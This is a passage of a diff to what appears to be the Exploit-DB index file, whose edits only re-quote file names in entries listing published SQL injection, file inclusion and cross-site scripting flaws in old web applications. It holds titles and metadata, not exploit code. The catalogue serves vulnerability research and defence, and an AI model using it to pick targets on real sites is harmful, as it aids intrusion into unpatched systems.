- events.php c Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 26207,platforms/php/webapps/26207.txt,"Land Down Under 700/701/800/801 - list.php Multiple Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 -26208,platforms/php/webapps/26208.txt,"Autolinks 2.1 Pro - Al_initialize.php Remote File Inclusion",2005-08-29,4Degrees,php,webapps,0 +26208,platforms/php/webapps/26208.txt,"Autolinks 2.1 Pro - 'Al_initialize.php' Remote File Inclusion",2005-08-29,4Degrees,php,webapps,0 26209,platforms/php/webapps/26209.txt,"PHP-Fusion 4.0/5.0/6.0 - BBCode URL Tag Script Injection",2005-08-29,slacker4ever_1,php,webapps,0 26211,platforms/php/webapps/26211.txt,"phpLDAPadmin 0.9.6/0.9.7 - 'welcome.php' Arbitrary File Inclusion",2005-08-30,rgod,php,webapps,0 26212,platforms/php/webapps/26212.txt,"FlatNuke 2.5.6 - ID Parameter Directory Traversal",2005-08-31,rgod,php,webapps,0 @@ -28884,14 +28888,14 @@ id,file,description,date,author,platform,type,port 26361,platforms/php/webapps/26361.txt,"MySource 2.14 - edit_table_cell_type_wysiwyg.php Stylesheet Parameter Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0 26362,platforms/php/webapps/26362.txt,"MySource 2.14 - new_upgrade_functions.php Multiple Parameter Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26363,platforms/php/webapps/26363.txt,"MySource 2.14 - init_mysource.php INCLUDE_PATH Parameter Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 -26364,platforms/php/webapps/26364.txt,"MySource 2.14 - Socket.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 -26365,platforms/php/webapps/26365.txt,"MySource 2.14 - Request.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 +26364,platforms/php/webapps/26364.txt,"MySource 2.14 - 'Socket.php' 'PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 +26365,platforms/php/webapps/26365.txt,"MySource 2.14 - 'Request.php' 'PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26366,platforms/php/webapps/26366.txt,"GLPI 0.83.8 - Multiple Vulnerabilities",2013-06-21,LiquidWorm,php,webapps,0 -26369,platforms/php/webapps/26369.txt,"MySource 2.14 - mail.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 -26370,platforms/php/webapps/26370.txt,"MySource 2.14 - Date.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 -26371,platforms/php/webapps/26371.txt,"MySource 2.14 - Span.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 -26372,platforms/php/webapps/26372.txt,"MySource 2.14 - mimeDecode.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 -26373,platforms/php/webapps/26373.txt,"MySource 2.14 - mime.php PEAR_PATH Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 +26369,platforms/php/webapps/26369.txt,"MySource 2.14 - 'mail.php' 'PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 +26370,platforms/php/webapps/26370.txt,"MySource 2.14 - 'Date.php' 'PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 +26371,platforms/php/webapps/26371.txt,"MySource 2.14 - 'Span.php' 'PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 +26372,platforms/php/webapps/26372.txt,"MySource 2.14 - 'mimeDecode.php' 'PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 +26373,platforms/php/webapps/26373.txt,"MySource 2.14 - 'mime.php' 'PEAR_PATH' Remote File Inclusion",2005-10-18,"Secunia Research",php,webapps,0 26377,platforms/php/webapps/26377.txt,"PHP-Nuke Search Module - modules.php Directory Traversal",2005-10-19,sp3x@securityreason.com,php,webapps,0 26378,platforms/php/webapps/26378.txt,"Chipmunk Forum - 'newtopic.php' forumID Parameter Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0 26379,platforms/php/webapps/26379.txt,"Chipmunk Forum - quote.php forumID Parameter Cross-Site Scripting",2005-10-20,"Alireza Hassani",php,webapps,0 @@ -28983,7 +28987,7 @@ id,file,description,date,author,platform,type,port 26499,platforms/php/webapps/26499.txt,"PHPSysInfo 2.x - Multiple Input Validation Vulnerabilities",2005-11-11,anonymous,php,webapps,0 26500,platforms/php/webapps/26500.txt,"PHPWebThings 1.4 - 'download.php' File Parameter SQL Injection",2005-11-12,A.1.M,php,webapps,0 26501,platforms/php/webapps/26501.txt,"ActiveCampaign 1-2-All Broadcast Email 4.0 - Admin Control Panel 'Username' SQL Injection",2005-11-12,bhs_team,php,webapps,0 -26502,platforms/php/webapps/26502.txt,"Help Center Live 1.0/1.2/2.0 - module.php Local File Inclusion",2005-11-14,"HACKERS PAL",php,webapps,0 +26502,platforms/php/webapps/26502.txt,"Help Center Live 1.0/1.2/2.0 - 'module.php' Local File Inclusion",2005-11-14,"HACKERS PAL",php,webapps,0 26503,platforms/php/webapps/26503.txt,"Wizz Forum - ForumAuthDetails.php AuthID Parameter SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 26504,platforms/php/webapps/26504.txt,"Wizz Forum - forumreply.php TopicID Parameter SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 26505,platforms/php/webapps/26505.txt,"Codegrrl - Protection.php Unspecified Code Execution",2005-11-14,"Robin Verton",php,webapps,0 @@ -29015,7 +29019,7 @@ id,file,description,date,author,platform,type,port 26541,platforms/php/webapps/26541.txt,"SimplePoll - results.php SQL Injection",2005-11-21,stranger-killer,php,webapps,0 26543,platforms/php/webapps/26543.txt,"APBoard - thread.php SQL Injection",2005-11-21,ksa_ksa82,php,webapps,0 26544,platforms/php/webapps/26544.txt,"PHP Download Manager 1.1.x - 'files.php' SQL Injection",2005-11-21,ksa_ksa82,php,webapps,0 -26545,platforms/php/webapps/26545.txt,"Tru-Zone Nuke ET 3.x - Search Module SQL Injection",2005-11-21,Lostmon,php,webapps,0 +26545,platforms/php/webapps/26545.txt,"Tru-Zone Nuke ET 3.x - (Search Module) SQL Injection",2005-11-21,Lostmon,php,webapps,0 26546,platforms/php/webapps/26546.txt,"PHPPost 1.0 - profile.php user Parameter Cross-Site Scripting",2005-11-21,trueend5,php,webapps,0 26547,platforms/php/webapps/26547.txt,"PHPPost 1.0 - mail.php user Parameter Cross-Site Scripting",2005-11-21,trueend5,php,webapps,0 26549,platforms/php/webapps/26549.txt,"Torrential 1.2 - Getdox.php Directory Traversal",2005-11-22,Shell,php,webapps,0 @@ -29046,7 +29050,7 @@ id,file,description,date,author,platform,type,port 26582,platforms/php/webapps/26582.txt,"SoftBiz Web Hosting Directory Script 1.1 - browsecats.php cid Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 26583,platforms/php/webapps/26583.txt,"SoftBiz Web Hosting Directory Script 1.1 - email.php h_id Parameter SQL Injection",2005-11-24,r0t,php,webapps,0 26584,platforms/php/webapps/26584.txt,"vtiger CRM 4.2 Leads Module - record Parameter Cross-Site Scripting",2005-11-24,"Christopher Kunz",php,webapps,0 -26585,platforms/php/webapps/26585.txt,"vtiger CRM 4.2 - RSS Aggregation Module Feed Cross-Site Scripting",2005-11-24,"Christopher Kunz",php,webapps,0 +26585,platforms/php/webapps/26585.txt,"vtiger CRM 4.2 - (RSS Aggregation Module Feed) Cross-Site Scripting",2005-11-24,"Christopher Kunz",php,webapps,0 26586,platforms/php/webapps/26586.txt,"vtiger CRM 4.2 - SQL Injection",2005-11-24,"Christopher Kunz",php,webapps,0 26587,platforms/php/webapps/26587.txt,"Comdev Vote Caster 3.1 - 'index.php' SQL Injection",2005-11-24,r0t,php,webapps,0 26588,platforms/php/webapps/26588.txt,"Orca Forum 4.3 - forum.php SQL Injection",2005-11-24,r0t3d3Vil,php,webapps,0 @@ -29204,7 +29208,7 @@ id,file,description,date,author,platform,type,port 26763,platforms/cfm/webapps/26763.txt,"Magic List Pro - view_archive.cfm ListID Parameter SQL Injection",2005-12-08,r0t,cfm,webapps,0 26764,platforms/cfm/webapps/26764.txt,"Magic Forum Personal - view_forum.cfm ForumID Parameter SQL Injection",2005-12-08,r0t,cfm,webapps,0 26765,platforms/cfm/webapps/26765.txt,"Magic Forum Personal - view_thread.cfm Multiple Parameter SQL Injection",2005-12-08,r0t,cfm,webapps,0 -26766,platforms/cfm/webapps/26766.txt,"CF_Nuke 4.6 - index.cfm Local File Inclusion",2005-12-08,r0t,cfm,webapps,0 +26766,platforms/cfm/webapps/26766.txt,"CF_Nuke 4.6 - 'index.cfm' Local File Inclusion",2005-12-08,r0t,cfm,webapps,0 26767,platforms/cfm/webapps/26767.txt,"CF_Nuke 4.6 - index.cfm Cross-Site Scripting",2005-12-08,r0t,cfm,webapps,0 26770,platforms/php/webapps/26770.txt,"MilliScripts 1.4 - register.php Cross-Site Scripting",2005-12-08,"Security Nation",php,webapps,0 26771,platforms/cgi/webapps/26771.txt,"Nortel SSL VPN 4.2.1.6 - Web Interface Input Validation",2005-12-08,"Daniel Fabian",cgi,webapps,0 @@ -29332,7 +29336,7 @@ id,file,description,date,author,platform,type,port 26918,platforms/php/webapps/26918.txt,"Plogger Beta 2 - Remote File Inclusion",2005-12-20,"Security .Net Information",php,webapps,0 26919,platforms/php/webapps/26919.txt,"AbleDesign D-Man 3.0 - Title Parameter Cross-Site Scripting",2005-12-20,$um$id,php,webapps,0 26920,platforms/cfm/webapps/26920.txt,"Quick Square Development Honeycomb Archive 3.0 - CategoryResults.cfm Multiple Parameter SQL Injection",2005-12-20,r0t3d3Vil,cfm,webapps,0 -26921,platforms/php/webapps/26921.txt,"Tolva 0.1 - Usermods.php Remote File Inclusion",2005-12-21,xbefordx,php,webapps,0 +26921,platforms/php/webapps/26921.txt,"Tolva 0.1 - 'Usermods.php' Remote File Inclusion",2005-12-21,xbefordx,php,webapps,0 26923,platforms/php/webapps/26923.txt,"Beehive Forum 0.6.2 - Multiple HTML Injection Vulnerabilities",2005-12-21,"Alireza Hassani",php,webapps,0 26924,platforms/jsp/webapps/26924.txt,"OpenEdit 4.0 - Results.HTML Cross-Site Scripting",2005-12-21,r0t3d3Vil,jsp,webapps,0 26925,platforms/php/webapps/26925.txt,"Papaya CMS 4.0.4 - Cross-Site Scripting",2005-12-21,r0t3d3Vil,php,webapps,0 @@ -29640,7 +29644,7 @@ id,file,description,date,author,platform,type,port 27308,platforms/php/webapps/27308.txt,"myPHPNuke 1.8.8 - 'reviews.php' Cross-Site Scripting",2006-02-22,"Mustafa Can Bjorn",php,webapps,0 27309,platforms/php/webapps/27309.txt,"myPHPNuke 1.8.8 - 'download.php' Cross-Site Scripting",2006-02-22,"Mustafa Can Bjorn",php,webapps,0 27310,platforms/asp/webapps/27310.txt,"Battleaxe Software BttlxeForum 2.0 - Failure.asp Cross-Site Scripting",2006-02-25,rUnViRuS,asp,webapps,0 -27311,platforms/php/webapps/27311.txt,"SPiD 1.3.1 - Scan_Lang_Insert.php Local File Inclusion",2006-02-25,"NSA Group",php,webapps,0 +27311,platforms/php/webapps/27311.txt,"SPiD 1.3.1 - 'Scan_Lang_Insert.php' Local File Inclusion",2006-02-25,"NSA Group",php,webapps,0 27312,platforms/php/webapps/27312.txt,"FreeHostShop Website Generator 3.3 - Arbitrary File Upload",2006-02-25,"NSA Group",php,webapps,0 27313,platforms/php/webapps/27313.txt,"DCI-Taskeen 1.03 - 'basket.php' Multiple Parameter SQL Injections",2006-02-25,Linux_Drox,php,webapps,0 27314,platforms/php/webapps/27314.txt,"DCI-Taskeen 1.03 - 'cat.php' Multiple Parameter SQL Injections",2006-02-25,Linux_Drox,php,webapps,0 @@ -29673,7 +29677,7 @@ id,file,description,date,author,platform,type,port 27354,platforms/php/webapps/27354.txt,"Easy Forum 2.5 - New User Image File HTML Injection",2006-03-04,"Aliaksandr Hartsuyeu",php,webapps,0 27355,platforms/php/webapps/27355.txt,"Woltlab Burning Board 2.3.4 - misc.php Cross-Site Scripting",2006-03-04,r57shell,php,webapps,0 27362,platforms/php/webapps/27362.txt,"Bitweaver 1.1/1.2 - Title Field HTML Injection",2006-03-06,Kiki,php,webapps,0 -27363,platforms/php/webapps/27363.txt,"PHORUM 3.x/5.x - Common.php Remote File Inclusion",2006-03-06,ERNE,php,webapps,0 +27363,platforms/php/webapps/27363.txt,"PHORUM 3.x/5.x - 'Common.php' Remote File Inclusion",2006-03-06,ERNE,php,webapps,0 27364,platforms/php/webapps/27364.txt,"Game-Panel 2.6 - 'login.php' Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 27557,platforms/php/webapps/27557.pl,"PHPSelect Submit-A-Link - HTML Injection",2006-04-01,s3rv3r_hack3r,php,webapps,0 27367,platforms/php/webapps/27367.txt,"Link Bank - Iframe.php Cross-Site Scripting",2006-03-07,Retard,php,webapps,0 @@ -29841,7 +29845,7 @@ id,file,description,date,author,platform,type,port 27586,platforms/php/webapps/27586.txt,"PHPMyForum 4.0 - 'index.php' 'type' Parameter CRLF Injection",2006-04-10,Psych0,php,webapps,0 27587,platforms/php/webapps/27587.txt,"PHPWebGallery 1.4.1 - 'category.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 27588,platforms/php/webapps/27588.txt,"PHPWebGallery 1.4.1 - 'picture.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 -27589,platforms/php/webapps/27589.txt,"SPIP 1.8.3 - Spip_login.php Remote File Inclusion",2006-04-10,cR45H3R,php,webapps,0 +27589,platforms/php/webapps/27589.txt,"SPIP 1.8.3 - 'Spip_login.php' Remote File Inclusion",2006-04-10,cR45H3R,php,webapps,0 27590,platforms/php/webapps/27590.txt,"APT-webshop 3.0/4.0 - modules.php Multiple SQL Injections",2005-04-10,r0t,php,webapps,0 27591,platforms/php/webapps/27591.txt,"Shadowed Portal 5.7 - Load.php Cross-Site Scripting",2006-04-10,Liz0ziM,php,webapps,0 27592,platforms/php/webapps/27592.txt,"SIRE 2.0 - Arbitrary File Upload",2006-04-10,simo64,php,webapps,0 @@ -29885,12 +29889,12 @@ id,file,description,date,author,platform,type,port 27650,platforms/php/webapps/27650.txt,"Farsinews 2.1/2.5 - 'search.php' Cross-Site Scripting",2006-04-14,"amin emami",php,webapps,0 27651,platforms/php/webapps/27651.txt,"Tiny Web Gallery 1.4 - 'index.php' Cross-Site Scripting",2006-04-15,Qex,php,webapps,0 27652,platforms/php/webapps/27652.txt,"Quack Chat 1.0 - Multiple Vulnerabilities",2013-08-17,"Dylan Irzi",php,webapps,80 -27970,platforms/php/webapps/27970.txt,"CyBoards PHP Lite 1.21/1.25 - Common.php Remote File Inclusion",2006-06-05,SpC-x,php,webapps,0 +27970,platforms/php/webapps/27970.txt,"CyBoards PHP Lite 1.21/1.25 - 'Common.php' Remote File Inclusion",2006-06-05,SpC-x,php,webapps,0 27655,platforms/ios/webapps/27655.txt,"Copy to WebDAV 1.1 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,ios,webapps,0 27656,platforms/ios/webapps/27656.txt,"Photo Transfer Upload 1.0 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,ios,webapps,0 27658,platforms/php/webapps/27658.txt,"PHPGuestbook 0.0.2/1.0 - HTML Injection",2006-04-15,Qex,php,webapps,0 27659,platforms/php/webapps/27659.txt,"PHPFaber TopSites - 'index.php' Cross-Site Scripting",2006-04-17,botan,php,webapps,0 -27660,platforms/php/webapps/27660.txt,"Monster Top List 1.4 - functions.php Remote File Inclusion",2006-04-17,r0t,php,webapps,0 +27660,platforms/php/webapps/27660.txt,"Monster Top List 1.4 - 'functions.php' Remote File Inclusion",2006-04-17,r0t,php,webapps,0 27661,platforms/php/webapps/27661.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (1)",2006-04-17,Hessam-x,php,webapps,0 27662,platforms/php/webapps/27662.txt,"Blursoft Blur6ex 0.3.462 - 'index.php' Local File Inclusion",2006-04-17,"Hamid Ebadi",php,webapps,0 27663,platforms/php/webapps/27663.txt,"DbbS 2.0 - Multiple Input Validation Vulnerabilities",2006-04-17,rgod,php,webapps,0 @@ -29933,7 +29937,7 @@ id,file,description,date,author,platform,type,port 28700,platforms/php/webapps/28700.txt,"CubeCart 3.0.x - view_order.php order_id Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 28053,platforms/hardware/webapps/28053.txt,"Zoom Telephonics ADSL Modem/Router - Multiple Vulnerabilities",2013-09-03,"Kyle Lovett",hardware,webapps,0 28054,platforms/php/webapps/28054.txt,"WordPress Plugin IndiaNIC Testimonial - Multiple Vulnerabilities",2013-09-03,RogueCoder,php,webapps,0 -27707,platforms/php/webapps/27707.txt,"I-RATER Platinum - Common.php Remote File Inclusion",2006-04-20,r0t,php,webapps,0 +27707,platforms/php/webapps/27707.txt,"I-RATER Platinum - 'Common.php' Remote File Inclusion",2006-04-20,r0t,php,webapps,0 27709,platforms/php/webapps/27709.txt,"4homepages 4Images 1.7 - 'member.php' Cross-Site Scripting",2006-04-20,Qex,php,webapps,0 27710,platforms/php/webapps/27710.txt,"W2B Online Banking - SID Parameter Cross-Site Scripting",2006-04-20,r0t,php,webapps,0 27975,platforms/php/webapps/27975.txt,"Bookmark4U 2.0 - inc/common.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 @@ -29973,7 +29977,7 @@ id,file,description,date,author,platform,type,port 27756,platforms/hardware/webapps/27756.txt,"Sitecom N300/N600 Devices - Multiple Vulnerabilities",2013-08-21,"Roberto Paleari",hardware,webapps,0 27757,platforms/asp/webapps/27757.txt,"DUclassified - detail.asp SQL Injection",2006-04-28,sadegh.sarshogh,asp,webapps,0 27761,platforms/cgi/webapps/27761.txt,"NeoMail - NeoMail.pl sessionid Parameter Cross-Site Scripting",2006-04-28,O.U.T.L.A.W,cgi,webapps,0 -27763,platforms/php/webapps/27763.php,"I-RATER Platinum - Config_settings.TPL.php Remote File Inclusion",2006-04-28,O.U.T.L.A.W,php,webapps,0 +27763,platforms/php/webapps/27763.php,"I-RATER Platinum - 'Config_settings.TPL.php' Remote File Inclusion",2006-04-28,O.U.T.L.A.W,php,webapps,0 27767,platforms/php/webapps/27767.txt,"Artmedic Event - 'index.php' Remote File Inclusion",2006-04-28,botan,php,webapps,0 27768,platforms/php/webapps/27768.php,"CoolMenus 4.0 - 'index.php' Remote File Inclusion",2006-04-28,botan,php,webapps,0 27770,platforms/php/webapps/27770.txt,"Blog 0.2.3/0.2.4 Mod - Weblog_posting.php SQL Injection",2006-04-29,Qex,php,webapps,0 @@ -29984,14 +29988,14 @@ id,file,description,date,author,platform,type,port 27774,platforms/hardware/webapps/27774.py,"Netgear ProSafe - Information Disclosure",2013-08-22,"Juan J. Guelfo",hardware,webapps,0 27776,platforms/linux/webapps/27776.rb,"Foreman (RedHat OpenStack/Satellite) - users/create Mass Assignment (Metasploit)",2013-08-22,Metasploit,linux,webapps,443 27777,platforms/windows/webapps/27777.txt,"DeWeS 0.4.2 - Directory Traversal",2013-08-22,"High-Tech Bridge SA",windows,webapps,0 -27779,platforms/php/webapps/27779.txt,"Advanced Guestbook 2.x - Addentry.php Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 +27779,platforms/php/webapps/27779.txt,"Advanced Guestbook 2.x - 'Addentry.php' Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 27780,platforms/php/webapps/27780.txt,"4Images 1.7.1 - top.php sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0 27781,platforms/php/webapps/27781.txt,"4Images 1.7.1 - 'member.php' sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0 27782,platforms/php/webapps/27782.txt,"TextFileBB 1.0.16 - Multiple Tag Script Injection Vulnerabilities",2006-04-29,r0xes,php,webapps,0 27783,platforms/php/webapps/27783.txt,"W-Agora 4.2 - BBCode Script Injection",2006-04-29,r0xes,php,webapps,0 27784,platforms/php/webapps/27784.txt,"PlanetGallery - Gallery_admin.php Authentication Bypass",2006-04-29,tugr@,php,webapps,0 -27785,platforms/php/webapps/27785.txt,"DMCounter 0.9.2 -b - Kopf.php Remote File Inclusion",2006-05-01,beford,php,webapps,0 -27786,platforms/php/webapps/27786.txt,"phpBB Knowledge Base 2.0.2 - Mod KB_constants.php Remote File Inclusion",2006-05-01,[Oo],php,webapps,0 +27785,platforms/php/webapps/27785.txt,"DMCounter 0.9.2 -b - 'Kopf.php' Remote File Inclusion",2006-05-01,beford,php,webapps,0 +27786,platforms/php/webapps/27786.txt,"phpBB Knowledge Base 2.0.2 - 'Mod KB_constants.php' Remote File Inclusion",2006-05-01,[Oo],php,webapps,0 27787,platforms/php/webapps/27787.txt,"MaxTrade 1.0.1 - Multiple SQL Injections",2006-05-01,r0t,php,webapps,0 27788,platforms/php/webapps/27788.txt,"OrbitHYIP 2.0 - signup.php referral Parameter Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 27789,platforms/php/webapps/27789.txt,"OrbitHYIP 2.0 - members.php id Parameter Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 @@ -30042,7 +30046,7 @@ id,file,description,date,author,platform,type,port 27842,platforms/asp/webapps/27842.txt,"MultiCalendars 3.0 - All_calendars.asp SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 27843,platforms/php/webapps/27843.txt,"MyBB 1.1.1 - showthread.php SQL Injection",2006-05-09,Breeeeh,php,webapps,0 27844,platforms/asp/webapps/27844.txt,"EPublisherPro 0.9.7 - Moreinfo.asp Cross-Site Scripting",2006-05-09,Dj_Eyes,asp,webapps,0 -27845,platforms/php/webapps/27845.php,"ISPConfig 2.2.2/2.2.3 - Session.INC.php Remote File Inclusion",2006-05-09,ReZEN,php,webapps,0 +27845,platforms/php/webapps/27845.php,"ISPConfig 2.2.2/2.2.3 - 'Session.INC.php' Remote File Inclusion",2006-05-09,ReZEN,php,webapps,0 27846,platforms/asp/webapps/27846.txt,"EImagePro - subList.asp CatID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 27848,platforms/php/webapps/27848.txt,"EImagePro - view.asp Pic Parameter SQL Injection",2006-05-09,Dj_Eyes,php,webapps,0 27849,platforms/asp/webapps/27849.txt,"EDirectoryPro - Search_result.asp SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 @@ -30062,7 +30066,7 @@ id,file,description,date,author,platform,type,port 27876,platforms/php/webapps/27876.txt,"MusicBox 2.3.8 - Multiple Vulnerabilities",2013-08-26,DevilScreaM,php,webapps,0 27878,platforms/hardware/webapps/27878.txt,"Loftek Nexus 543 IP Cameras - Multiple Vulnerabilities",2013-08-26,"Craig Young",hardware,webapps,0 27879,platforms/php/webapps/27879.txt,"Joomla! Component 'com_virtuemart' 2.0.22a - SQL Injection",2013-08-26,"Matias Fontanini",php,webapps,0 -27880,platforms/php/webapps/27880.pl,"RadScripts RadLance 7.0 - popup.php Local File Inclusion",2006-05-15,Mr.CrackerZ,php,webapps,0 +27880,platforms/php/webapps/27880.pl,"RadScripts RadLance 7.0 - 'popup.php' Local File Inclusion",2006-05-15,Mr.CrackerZ,php,webapps,0 27881,platforms/php/webapps/27881.txt,"PHPODP 1.5 - ODP.php Cross-Site Scripting",2006-05-15,Kiki,php,webapps,0 27883,platforms/php/webapps/27883.txt,"MonoChat 1.0 - HTML Injection",2005-05-15,X-BOY,php,webapps,0 27884,platforms/php/webapps/27884.txt,"Confixx 3.0/3.1 - 'index.php' Cross-Site Scripting",2006-05-15,LoK-Crew,php,webapps,0 @@ -30096,7 +30100,7 @@ id,file,description,date,author,platform,type,port 27924,platforms/php/webapps/27924.txt,"ToendaCMS 0.7 - 'index.php' Cross-Site Scripting",2006-05-31,Jokubas,php,webapps,0 27926,platforms/php/webapps/27926.txt,"PHPMyDesktop/Arcade 1.0 - 'index.php' Local File Inclusion",2006-05-31,darkgod,php,webapps,0 27927,platforms/php/webapps/27927.txt,"PHP-Nuke 7.x - Multiple Remote File Inclusion",2005-05-31,ERNE,php,webapps,0 -27928,platforms/php/webapps/27928.txt,"osTicket 1.x - Open_form.php Remote File Inclusion",2006-05-31,Sweet,php,webapps,0 +27928,platforms/php/webapps/27928.txt,"osTicket 1.x - 'Open_form.php' Remote File Inclusion",2006-05-31,Sweet,php,webapps,0 27929,platforms/php/webapps/27929.txt,"vBulletin 3.0.10 - Portal.php SQL Injection",2006-05-31,SpC-x,php,webapps,0 27932,platforms/asp/webapps/27932.txt,"Hogstorps Guestbook 2.0 - Unauthorized Access",2006-05-01,omnipresent,asp,webapps,0 27933,platforms/php/webapps/27933.txt,"Tekno.Portal - Bolum.php SQL Injection",2006-06-01,SpC-x,php,webapps,0 @@ -30109,7 +30113,7 @@ id,file,description,date,author,platform,type,port 27945,platforms/asp/webapps/27945.txt,"Enigma Haber 4.2 - Cross-Site Scripting",2006-06-02,The_BeKiR,asp,webapps,0 27946,platforms/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,php,webapps,0 27947,platforms/php/webapps/27947.txt,"TAL RateMyPic 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0 -27948,platforms/php/webapps/27948.txt,"Squirrelmail 1.4.x - Redirect.php Local File Inclusion",2006-06-02,brokejunker,php,webapps,0 +27948,platforms/php/webapps/27948.txt,"Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion",2006-06-02,brokejunker,php,webapps,0 27949,platforms/php/webapps/27949.txt,"Ovidentia 5.6.x/5.8 - approb.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 27950,platforms/php/webapps/27950.txt,"Ovidentia 5.6.x/5.8 - vacadmb.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 27951,platforms/php/webapps/27951.txt,"Ovidentia 5.6.x/5.8 - vacadma.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 @@ -30121,7 +30125,7 @@ id,file,description,date,author,platform,type,port 27958,platforms/php/webapps/27958.txt,"DELTAScripts PHP Pro Publish 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,Soot,php,webapps,0 27959,platforms/php/webapps/27959.txt,"PHP ManualMaker 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0 27960,platforms/asp/webapps/27960.txt,"LocazoList Classifieds 1.0 - Viewmsg.asp SQL Injection",2006-06-02,ajann,asp,webapps,0 -27961,platforms/php/webapps/27961.txt,"phpBB 2.0.x - template.php Remote File Inclusion",2006-06-02,Canberx,php,webapps,0 +27961,platforms/php/webapps/27961.txt,"phpBB 2.0.x - 'template.php' Remote File Inclusion",2006-06-02,Canberx,php,webapps,0 27962,platforms/php/webapps/27962.txt,"IBWd Guestbook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,php,webapps,0 27963,platforms/php/webapps/27963.txt,"XUEBook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,php,webapps,0 27964,platforms/php/webapps/27964.txt,"CoolForum 0.x - editpost.php SQL Injection",2006-06-05,DarkFig,php,webapps,0 @@ -30154,7 +30158,7 @@ id,file,description,date,author,platform,type,port 28021,platforms/php/webapps/28021.txt,"Andy Mack 35mm Slide Gallery 6.0 - popup.php Multiple Parameter Cross-Site Scripting",2006-06-13,black-cod3,php,webapps,0 28022,platforms/php/webapps/28022.txt,"Woltlab Burning Board 2.x - Multiple SQL Injections",2006-06-14,"CrAzY CrAcKeR",php,webapps,0 28023,platforms/php/webapps/28023.txt,"Confixx 3.0/3.1 - FTP_index.php Cross-Site Scripting",2006-06-14,kr4ch,php,webapps,0 -28024,platforms/php/webapps/28024.txt,"phpBB - BBRSS.php Remote File Inclusion",2006-06-14,SpC-x,php,webapps,0 +28024,platforms/php/webapps/28024.txt,"phpBB - 'BBRSS.php' Remote File Inclusion",2006-06-14,SpC-x,php,webapps,0 28025,platforms/php/webapps/28025.txt,"RahnemaCo - 'page.php' Remote File Inclusion",2006-06-14,Breeeeh,php,webapps,0 28027,platforms/php/webapps/28027.txt,"ISPConfig 2.2.3 - Multiple Remote File Inclusion",2006-06-14,"Federico Fazzi",php,webapps,0 28028,platforms/php/webapps/28028.txt,"vBulletin 2.x/3.x - Multiple Cross-Site Scripting Vulnerabilities",2006-06-15,Luny,php,webapps,0 @@ -30203,7 +30207,7 @@ id,file,description,date,author,platform,type,port 28101,platforms/php/webapps/28101.txt,"Custom Dating Biz 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0 28102,platforms/php/webapps/28102.txt,"Winged Gallery 1.0 - Thumb.php Cross-Site Scripting",2006-06-24,Luny,php,webapps,0 28104,platforms/php/webapps/28104.txt,"ADODB 4.6/4.7 - 'Tmssql.php' Cross-Site Scripting",2006-06-26,"Rodrigo Silva",php,webapps,0 -28105,platforms/php/webapps/28105.txt,"eNpaper1 - Root_Header.php Remote File Inclusion",2006-06-26,almaster,php,webapps,0 +28105,platforms/php/webapps/28105.txt,"eNpaper1 - 'Root_Header.php' Remote File Inclusion",2006-06-26,almaster,php,webapps,0 28106,platforms/php/webapps/28106.txt,"Bee-hive 1.2 - Multiple Remote File Inclusion",2006-06-16,Kw3[R]Ln,php,webapps,0 28107,platforms/php/webapps/28107.txt,"cPanel 10 - Select.HTML Cross-Site Scripting",2006-06-26,preth00nker,php,webapps,0 